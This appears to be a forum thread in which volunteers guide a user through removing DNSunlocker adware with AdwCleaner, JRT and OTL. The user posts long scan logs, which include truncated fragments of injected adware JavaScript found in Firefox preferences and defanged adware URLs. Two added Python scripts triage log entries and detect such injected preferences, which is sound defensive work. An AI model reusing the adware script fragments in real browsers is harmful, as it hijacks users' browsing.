[-] [C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\i4n38c5y.default\prefs.js] [Preference] 削除済み項目 : user_pref("extensions.tregO40J4Sa4e0xe.scode", "(function(){try{if(window.location.href.indexOf(\"rjg4pdC5rjC8qjY9qTw5rHa8rTw\")>-1){return;}}catch(e){}try{var d=[[\"www.ewoss.com\",\"livewebcams.xyz\[...]
[-] [C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Homepage] 削除済み項目 : hxxp://search.conduit.com/?gd=&ctid=CT3321540&octid=EB_ORIGINAL_CTID&ISID=M88EA6552-C4B1-4C2F-8B94-6DCB9463696E&SearchSource=55&CUI=&UM=5&UP=SPE05EDA6A-3482-4565-8186-45BFDF5738DC&SSPV=

*************************

:: Winsock設定を初期化しました

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [9836 バイト] ##########
  • あすとろ
  • 2015/09/11 (Fri) 00:33:22
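Added example, not part of any post in this thread: the AdwCleaner log above reports some keys as deleted (`[-]`) and others as not deleted (`[!]`), and this Python sketch checks whether each `[!]` key was already deleted under another name for the same key. It assumes that the `[x64]` tag only marks the 64-bit registry view and that the SID printed in the log belongs to the logged-on user, so that `HKU\<SID>` and `HKCU` are the same hive; `ExampleResidual` is a constructed entry, not from the log.

```python
import re

# SID exactly as printed in the log above; assumed to be the logged-on user.
USER_SID = "S-1-5-21-2268393351-900118556-74167924-1000"

# Lines copied from the AdwCleaner log on this page.
PAGE_LINES = r"""
[-] キー 削除済み項目 : HKCU\Software\InstallCore
[-] キー 削除済み項目 : HKCU\Software\systweak
[-] キー 削除済み項目 : HKCU\Software\UpdateStar
[-] キー 削除済み項目 : HKCU\Software\AppDataLow\Software\ViewPassword
[-] キー 削除済み項目 : HKLM\SOFTWARE\SupTab
[!] キー ノット 削除済み項目 : [x64] HKCU\Software\InstallCore
[!] キー ノット 削除済み項目 : [x64] HKCU\Software\systweak
[!] キー ノット 削除済み項目 : [x64] HKCU\Software\UpdateStar
[!] キー ノット 削除済み項目 : HKU\S-1-5-21-2268393351-900118556-74167924-1000\Software\AppDataLow\Software\ViewPassword
"""
# Constructed line (not in the log) so that the follow-up branch is exercised.
CONSTRUCTED_LINE = r"[!] キー ノット 削除済み項目 : HKLM\SOFTWARE\ExampleResidual"
SAMPLE_LOG = PAGE_LINES + CONSTRUCTED_LINE + "\n"

ENTRY = re.compile(r"^\[([-!])\]\s")


def parse_entries(text):
    """Return (marker, item) pairs for every '[-]' / '[!]' line."""
    entries = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue
        # The item follows the first ' : ' separator on the line.
        _, sep, item = line.partition(" : ")
        if sep:
            entries.append((m.group(1), item.strip()))
    return entries


def normalize(item, user_sid):
    """Reduce a logged key to one canonical, case-insensitive form."""
    key = re.sub(r"^\[x64\]\s*", "", item)          # drop the view tag
    prefix = "HKU\\" + user_sid + "\\"
    if key.upper().startswith(prefix.upper()):       # HKU\<SID>\ -> HKCU\
        key = "HKCU\\" + key[len(prefix):]
    return key.casefold()                            # registry paths ignore case


def triage_failures(text, user_sid):
    """Split '[!]' entries into those explained by a '[-]' line and the rest."""
    entries = parse_entries(text)
    deleted = {normalize(item, user_sid) for mark, item in entries if mark == "-"}
    report = {"explained": [], "needs_follow_up": []}
    for mark, item in entries:
        if mark != "!":
            continue
        same_key_deleted = normalize(item, user_sid) in deleted
        report["explained" if same_key_deleted else "needs_follow_up"].append(item)
    return report


if __name__ == "__main__":
    result = triage_failures(SAMPLE_LOG, USER_SID)
    for bucket, items in result.items():
        print(bucket)
        for item in items:
            print("   ", item)
```

On the lines taken from this page, all four `[!]` entries match a key that a `[-]` line already removed; only the constructed entry is left for follow-up.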
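Remove AC and MBAM, then scan with JRT
Good evening, my name is IVNO.
悪代官 is busy and unable to reply, so I will be taking over.

So you were unable to find the MBAM log.
AC detected a large number of items and dealt with them.
Neither AC nor MBAM is needed any longer.
Start AC and press its Uninstall button to remove it, and remove MBAM using GU.
Let's remove as much as we can before moving on to manual removal.

Please get the following software ready.

Malwarebytes Junkware Removal tool (commonly known as JRT)
http://downloads.malwarebytes.org/file/jrt
Clicking the link downloads the file; save it somewhere easy to find.
To remove it later, put the program file itself in the Recycle Bin and delete it.

Once you are ready, we will begin.
Normal mode is fine for this step.
Start JRT.
Press Enter or any other key to start the scan.
If anything is detected you will be asked whether to reboot; press the N key to cancel the reboot.
When all detection has finished the results are displayed; save them somewhere easy to find.
After saving, reboot the PC once.
After the reboot, please paste the JRT log in your reply.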
  • IVNO
  • MAIL
  • 2015/09/11 (Fri) 01:45:27
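Re: DNSunlocker infection
Good morning.

>悪代官 is busy and unable to reply, so I will be taking over.
Thank you for your help; I look forward to continuing to work with you.

Without further ado, here is the JRT log.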


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 7.6.1 (09.08.2015:1)
OS: Windows 7 Home Premium x64
Ran by 【ユーザー名】 on 2015/09/11 at 9:32:12.34
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services

Successfully deleted: [Service] {72074a89-563a-4402-894b-cfea7ec6858b}Gw64 [Reboot required]



~~~ Tasks



~~~ Registry Values



~~~ Registry Keys



~~~ Files

Successfully deleted: [File] C:\Users\【ユーザー名】\AppData\Roaming\appdataFr2.bin
Successfully deleted: [File] C:\Users\【ユーザー名】\AppData\Roaming\appdataFr25.bin



~~~ Folders

Successfully deleted: [Empty Folder] C:\Users\【ユーザー名】\Appdata\Local\{56E7EB77-E331-4D13-8347-4BDACD0A07A9}
Successfully deleted: [Empty Folder] C:\Users\【ユーザー名】\Appdata\Local\{9356F216-A6AC-44FF-B942-0AA5DD8D12F4}
Successfully deleted: [Empty Folder] C:\Users\【ユーザー名】\Appdata\Local\{96A68A8B-71DF-4F8C-A23A-EE59604C4633}
Successfully deleted: [Empty Folder] C:\Users\【ユーザー名】\Appdata\Local\{ACFF6CF9-5C5C-47DA-8296-65B05713BF11}
Successfully deleted: [Folder] C:\Windows\SysWOW64\ai_recyclebin



~~~ FireFox

Successfully deleted the following from C:\Users\【ユーザー名】\AppData\Roaming\mozilla\firefox\profiles\i4n38c5y.default\prefs.js

user_pref(extensions.BU9VxlWSf7xOHT97.scode, (function(){try{if(window.self.location.href.indexOf(\rHU6pjw7qda7pjnErdg8pda8rn\)>-1){return;}}catch(e){}try{var d=[[\trian
user_pref(extensions.BU9VxlWSf7xOHT97.url, hxxp://sweetdiaryset.info/sync2/?q=hfZ9oenGhchEAen0rihTB6lKDzt4okPntNtVh7n0rjkErTs6rjUGrdw8tMFHhd9Fqja9rjgFqHwGrjgMDMlGojUMAe4Uoj
user_pref(extensions.aMgjLFK2Ue6BTnyh.scode, (function(){try{if(window.self.location.href.indexOf(\rHU6pjw7qda7pjnErdg8pda8rn\)>-1){return;}}catch(e){}try{var d=[[\trian
user_pref(extensions.hijEKzNnFJEYjd0V.scode, (function(){try{if(window.self.location.href.indexOf(\rHU6pjw7qda7pjnErdg8pda8rn\)>-1){return;}}catch(e){}try{var d=[[\trian



~~~ Chrome


[C:\Users\【ユーザー名】\Appdata\Local\Google\Chrome\User Data\Default\Preferences] - default search provider reset

[C:\Users\【ユーザー名】\Appdata\Local\Google\Chrome\User Data\Default\Preferences] - Extensions Deleted:

[C:\Users\【ユーザー名】\Appdata\Local\Google\Chrome\User Data\Default\Secure Preferences] - default search provider reset

[C:\Users\【ユーザー名】\Appdata\Local\Google\Chrome\User Data\Default\Secure Preferences] - Extensions Deleted:
[]





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 2015/09/11 at 9:36:12.43
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  • あすとろ
  • 2015/09/11 (Fri) 10:04:10
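Added example, not part of any post in this thread: the AdwCleaner and JRT logs above both remove Firefox preferences named `extensions.<16 characters>.scode` / `.url` whose value is a block of JavaScript, and this Python sketch looks for that pattern in a prefs.js file so the cleanup can be verified afterwards. The name pattern is derived only from the entries shown on this page; the sample preferences, the name `AAAABBBBCCCCDDDD` and the `example.invalid` URL are constructed.

```python
import re

# user_pref("name", value);  -- the name may contain backslash escapes
PREF_RE = re.compile(r'^user_pref\("((?:[^"\\]|\\.)*)",\s*(.*)\);\s*$')

# Name shape seen in the logs on this page: extensions.<16 alnum>.scode|url
INJECTED_NAME_RE = re.compile(r"^extensions\.[A-Za-z0-9]{16}\.(?:scode|url)$")

# A string preference has no reason to carry executable JavaScript.
SCRIPT_RE = re.compile(
    r"\(\s*function\s*\(|window\.(?:self\.)?location|document\.createElement|\beval\s*\("
)

# Constructed prefs.js content: four ordinary entries and two modelled on the logs.
SAMPLE_PREFS = r'''
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.search.region", "JP");
user_pref("extensions.AAAABBBBCCCCDDDD.scode", "(function(){try{if(window.self.location.href.indexOf(\"marker\")>-1){return;}}catch(e){}})();");
user_pref("extensions.AAAABBBBCCCCDDDD.url", "http://tracker.example.invalid/sync2/?q=placeholder");
user_pref("extensions.ui.dictionary.hidden", true);
user_pref("extensions.blocklist.pingCountVersion", 0);
'''


def parse_prefs(text):
    """Return (name, value) pairs; string values are unquoted and unescaped."""
    prefs = []
    for line in text.splitlines():
        m = PREF_RE.match(line.strip())
        if not m:
            continue  # comments, blank lines, anything that is not user_pref
        name, raw = m.group(1), m.group(2).strip()
        if len(raw) >= 2 and raw[0] == raw[-1] == '"':
            # Strip the quotes and undo \" and \\ (enough for matching).
            raw = re.sub(r"\\(.)", r"\1", raw[1:-1])
        prefs.append((name, raw))
    return prefs


def scan_prefs(text):
    """Flag preferences that match the injected-name shape or hold script."""
    findings = []
    for name, value in parse_prefs(text):
        reasons = []
        if INJECTED_NAME_RE.match(name):
            reasons.append("name-pattern")
        if SCRIPT_RE.search(value):
            reasons.append("script-in-value")
        if reasons:
            findings.append({"name": name, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan_prefs(SAMPLE_PREFS):
        print(finding["name"], ", ".join(finding["reasons"]))
```

Run it against a copy of prefs.js taken while Firefox is closed, because Firefox rewrites the file from memory when it exits.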
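Remove JRT, then scan with OTL
As expected, JRT did a nice job of cleaning things up.
JRT is no longer needed, so please remove it following the instructions given when you installed it.
From here on it is manual removal.

Please get the following software ready.

OldTimer Listit (commonly known as OTL)
http://oldtimer.geekstogo.com/OTL.exe
This is a direct link. Save it somewhere easy to find, such as the desktop.
To remove it later, start it and press the "Cleanup" button; it will be deleted automatically.

Before starting OTL, close as many programs as possible, including your browsers.
Once they are closed, start OTL.
Tick Scan All Users at the top centre of the window.
When that is set, copy and paste the following into the Custom Scan/Fixes box.

------ copy from below this line ------
SHOWHIDDEN
%windir%\tasks\*.job
DRIVES
BASESERVICES
%SYSTEMDRIVE%\*.exe
ACTIVEX
CREATERESTOREPOINT
------ copy down to above this line ------

After pasting, click Run Scan to run the scan.
The scan takes a few minutes to complete, so please wait.
When the scan finishes, OTL.txt and Extras.txt are written to the same location where you saved OTL;
please paste them in your reply.
Note that OTL logs are, by their nature, very long.
This board's character limit is about 30,000 characters counted as hiragana, or about 60,000 counted as alphanumerics.
The log will certainly exceed that limit, so, leaving a margin, please split it into pieces of about 55,000 characters each,
checking with a character counter such as the one at the URL below, and post them.
http://www2u.biglobe.ne.jp/~yuichi/rest/strcount.html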
  • IVNO
  • MAIL
  • 2015/09/11 (Fri) 17:10:14
OTL1
Sorry for the late reply.

Without further ado, I will post the OTL logs.



OTL logfile created on: 2015/09/12 16:51:59 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\【ユーザー名】\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000411 | Country: 日本 | Language: JPN | Date Format: yyyy/MM/dd

3.84 Gb Total Physical Memory | 2.76 Gb Available Physical Memory | 71.85% Memory free
7.68 Gb Paging File | 6.02 Gb Available in Paging File | 78.39% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 447.66 Gb Total Space | 112.59 Gb Free Space | 25.15% Space Free | Partition Type: NTFS

Computer Name: 【ユーザー名】 | User Name: 【ユーザー名】 | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

[color=#E56717]========== Processes (SafeList) ==========[/color]

PRC - [2015/09/12 10:35:35 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\【ユーザー名】\Desktop\OTL.exe
PRC - [2015/08/12 02:16:20 | 055,175,056 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaConverter.exe
PRC - [2015/08/12 02:16:20 | 001,388,944 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaRenderer.exe
PRC - [2015/08/12 02:16:20 | 000,840,080 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
PRC - [2015/07/24 20:36:40 | 000,069,448 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Chrome Remote Desktop\45.0.2454.17\remoting_host.exe
PRC - [2015/07/07 20:12:28 | 000,082,128 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2015/05/01 11:17:04 | 001,772,672 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
PRC - [2015/05/01 11:16:10 | 001,394,816 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
PRC - [2015/02/04 23:44:22 | 000,076,152 | ---- | M] () -- C:\Windows\SysWOW64\PnkBstrA.exe
PRC - [2012/03/27 21:17:04 | 000,988,456 | ---- | M] (CyberLink) -- C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe
PRC - [2012/03/23 18:33:48 | 000,419,408 | ---- | M] (Dritek System Inc.) -- C:\Program Files (x86)\Launch Manager\LMutilps32.exe
PRC - [2012/03/23 18:33:46 | 000,355,920 | ---- | M] (Dritek System Inc.) -- C:\Program Files (x86)\Launch Manager\dsiwmis.exe
PRC - [2012/03/23 18:33:46 | 000,343,632 | ---- | M] (Dritek System Inc.) -- C:\Program Files (x86)\Launch Manager\LMworker.exe
PRC - [2012/03/23 18:33:44 | 001,105,488 | ---- | M] (Dritek System Inc.) -- C:\Program Files (x86)\Launch Manager\LManager.exe
PRC - [2012/02/29 22:49:06 | 000,028,264 | ---- | M] (Acer Incorporated) -- C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
PRC - [2012/02/08 11:03:36 | 000,363,800 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
PRC - [2012/02/08 11:03:34 | 000,277,784 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
PRC - [2012/02/08 11:03:16 | 000,161,560 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
PRC - [2012/02/06 17:54:04 | 000,255,376 | ---- | M] (Acer Incorporated) -- C:\Program Files\Acer\Acer Updater\UpdaterService.exe
PRC - [2012/02/01 16:29:58 | 000,013,592 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
PRC - [2012/01/05 14:22:10 | 000,256,536 | ---- | M] (NTI Corporation) -- C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
PRC - [2012/01/05 14:21:44 | 000,296,984 | ---- | M] (NTI Corporation) -- C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe


[color=#E56717]========== Modules (No Company Name) ==========[/color]

MOD - [2015/01/20 22:35:44 | 001,044,776 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2014/02/12 20:58:32 | 000,073,544 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2012/01/05 14:22:36 | 000,465,344 | ---- | M] () -- C:\Program Files (x86)\NTI\Acer Backup Manager\sqlite3.dll


[color=#E56717]========== Services (SafeList) ==========[/color]

SRV:[b]64bit:[/b] - [2015/06/02 17:35:47 | 011,086,056 | ---- | M] (DisplayLink Corp.) [Auto | Running] -- C:\Program Files\DisplayLink Core Software\DisplayLinkManager.exe -- (DisplayLinkService)
SRV:[b]64bit:[/b] - [2015/05/26 03:19:13 | 001,255,424 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\diagtrack.dll -- (DiagTrack)
SRV:[b]64bit:[/b] - [2015/04/30 01:53:40 | 000,366,544 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- c:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV:[b]64bit:[/b] - [2015/04/30 01:53:40 | 000,023,816 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV:[b]64bit:[/b] - [2014/01/27 08:37:08 | 000,185,792 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Windows\SysNative\mfevtps.exe -- (mfevtp)
SRV:[b]64bit:[/b] - [2014/01/27 08:31:12 | 000,219,752 | ---- | M] () [Auto | Running] -- C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe -- (mfefire)
SRV:[b]64bit:[/b] - [2013/08/08 09:54:14 | 000,048,128 | ---- | M] (Broadcom Corporation) [Auto | Running] -- C:\Program Files\Broadcom\Broadcom 802.11 Network Adapter\WLTRYSVC.EXE -- (wltrysvc)
SRV:[b]64bit:[/b] - [2012/02/22 13:21:16 | 000,199,272 | ---- | M] () [Auto | Running] -- C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe -- (McShield)
SRV:[b]64bit:[/b] - [2012/02/06 17:54:04 | 000,255,376 | ---- | M] (Acer Incorporated) [Auto | Running] -- C:\Program Files\Acer\Acer Updater\UpdaterService.exe -- (Live Updater Service)
SRV:[b]64bit:[/b] - [2012/02/02 22:29:52 | 000,628,448 | ---- | M] (Intel(R) Corporation) [Auto | Running] -- C:\Program Files\Intel\iCLS Client\HeciServer.exe -- (Intel(R)
SRV:[b]64bit:[/b] - [2012/01/20 16:15:14 | 000,149,504 | ---- | M] (Intel(R) Corporation) [On_Demand | Stopped] -- C:\Program Files\Intel\TurboBoost\TurboBoost.exe -- (TurboBoost)
SRV:[b]64bit:[/b] - [2010/09/22 18:10:10 | 000,057,184 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Program Files\Windows Live\Mesh\wlcrasvc.exe -- (wlcrasvc)
SRV - [2015/09/07 23:15:08 | 000,148,080 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2015/08/12 03:06:17 | 000,269,000 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2015/08/12 02:16:20 | 000,840,080 | ---- | M] (Google Inc.) [Auto | Running] -- C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe -- (GoogleIMEJaCacheService)
SRV - [2015/08/03 12:47:10 | 002,545,512 | ---- | M] (LogMeIn Inc.) [Auto | Running] -- C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe -- (Hamachi2Svc)
SRV - [2015/08/03 12:13:12 | 000,417,552 | ---- | M] (LogMeIn, Inc.) [Auto | Running] -- C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe -- (LMIGuardianSvc)
SRV - [2015/07/24 20:36:40 | 000,069,448 | ---- | M] (Google Inc.) [Auto | Running] -- C:\Program Files (x86)\Google\Chrome Remote Desktop\45.0.2454.17\remoting_host.exe -- (chromoting)
SRV - [2015/07/24 08:23:38 | 000,838,336 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2015/07/09 13:14:04 | 000,327,296 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2015/07/07 20:12:28 | 000,082,128 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2015/05/01 11:17:04 | 001,772,672 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe -- (c2cpnrsvc)
SRV - [2015/05/01 11:16:10 | 001,394,816 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe -- (c2cautoupdatesvc)
SRV - [2015/02/04 23:44:22 | 000,076,152 | ---- | M] () [Auto | Running] -- C:\Windows\SysWOW64\PnkBstrA.exe -- (PnkBstrA)
SRV - [2015/01/29 05:13:13 | 001,910,128 | ---- | M] (Electronic Arts) [On_Demand | Stopped] -- C:\Program Files (x86)\Origin\OriginClientService.exe -- (Origin Client Service)
SRV - [2014/04/11 23:08:08 | 000,103,608 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2014/03/21 07:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2013/08/08 10:00:02 | 000,655,624 | ---- | M] (Acresso Software Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe -- (FLEXnet Licensing Service)
SRV - [2012/04/23 13:25:32 | 000,276,248 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs)
SRV - [2012/03/23 18:33:46 | 000,355,920 | ---- | M] (Dritek System Inc.) [Auto | Running] -- C:\Program Files (x86)\Launch Manager\dsiwmis.exe -- (DsiWMIService)
SRV - [2012/02/29 22:49:06 | 000,028,264 | ---- | M] (Acer Incorporated) [Auto | Running] -- C:\Program Files (x86)\Acer\Registration\GREGsvc.exe -- (GREGService)
SRV - [2012/02/08 11:03:36 | 000,363,800 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2012/02/08 11:03:34 | 000,277,784 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2012/02/08 11:03:16 | 000,161,560 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe -- (jhi_service)
SRV - [2012/02/01 16:29:58 | 000,013,592 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe -- (IAStorDataMgrSvc)
SRV - [2012/01/05 14:22:10 | 000,256,536 | ---- | M] (NTI Corporation) [Auto | Running] -- C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe -- (NTI IScheduleSvc)
SRV - [2011/06/21 12:55:04 | 000,173,424 | ---- | M] (Egis Technology Inc. ) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\EgisTec\Services\EgisTicketService.exe -- (EgisTec Ticket Service)
SRV - [2010/06/01 15:31:28 | 002,804,568 | ---- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe -- (NOBU)


[color=#E56717]========== Driver Services (SafeList) ==========[/color]

DRV:[b]64bit:[/b] - [2015/06/16 20:38:51 | 000,030,264 | ---- | M] (Disc Soft Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dtlitescsibus.sys -- (dtlitescsibus)
DRV:[b]64bit:[/b] - [2015/06/02 17:38:27 | 000,441,064 | ---- | M] (DisplayLink Corp.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\dlkmd.sys -- (dlkmd)
DRV:[b]64bit:[/b] - [2015/06/02 17:38:27 | 000,018,664 | ---- | M] (DisplayLink Corp.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\dlkmdldr.sys -- (dlkmdldr)
DRV:[b]64bit:[/b] - [2015/03/04 19:34:52 | 000,124,568 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\NisDrvWFP.sys -- (NisDrv)
DRV:[b]64bit:[/b] - [2014/07/28 14:52:00 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:[b]64bit:[/b] - [2014/01/27 08:43:26 | 000,070,592 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\cfwids.sys -- (cfwids)
DRV:[b]64bit:[/b] - [2014/01/27 08:37:32 | 000,344,688 | ---- | M] (McAfee, Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\mfewfpk.sys -- (mfewfpk)
DRV:[b]64bit:[/b] - [2014/01/27 08:33:26 | 000,783,864 | ---- | M] (McAfee, Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\mfehidk.sys -- (mfehidk)
DRV:[b]64bit:[/b] - [2014/01/27 08:31:34 | 000,520,696 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\mfefirek.sys -- (mfefirek)
DRV:[b]64bit:[/b] - [2014/01/27 08:30:06 | 000,311,600 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\mfeavfk.sys -- (mfeavfk)
DRV:[b]64bit:[/b] - [2014/01/27 08:29:22 | 000,180,272 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mfeapfk.sys -- (mfeapfk)
DRV:[b]64bit:[/b] - [2013/10/15 17:50:00 | 000,169,720 | ---- | M] (AhnLab, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mkd3kfnt.sys -- (Mkd3kfNt)
DRV:[b]64bit:[/b] - [2013/10/02 11:22:20 | 000,056,832 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:[b]64bit:[/b] - [2013/08/08 09:54:14 | 004,746,304 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BCMWL664.SYS -- (BCM43XX)
DRV:[b]64bit:[/b] - [2013/08/08 09:54:14 | 000,022,592 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\bcm42rly.sys -- (BCM42RLY)
DRV:[b]64bit:[/b] - [2013/08/08 09:54:13 | 000,021,568 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\bcmvwl64.sys -- (BcmVWL)
DRV:[b]64bit:[/b] - [2013/05/31 09:17:00 | 000,112,888 | ---- | M] (AhnLab, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Mkd2Nadr.sys -- (Mkd2Nadr)
DRV:[b]64bit:[/b] - [2013/05/31 01:16:40 | 000,064,280 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LGSHidFilt.Sys -- (LGSHidFilt)
DRV:[b]64bit:[/b] - [2012/11/13 16:49:00 | 000,098,104 | ---- | M] (AhnLab, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Mkd2BthF.sys -- (Mkd2Bthf)
DRV:[b]64bit:[/b] - [2012/08/23 23:10:20 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:[b]64bit:[/b] - [2012/08/23 23:08:26 | 000,030,208 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
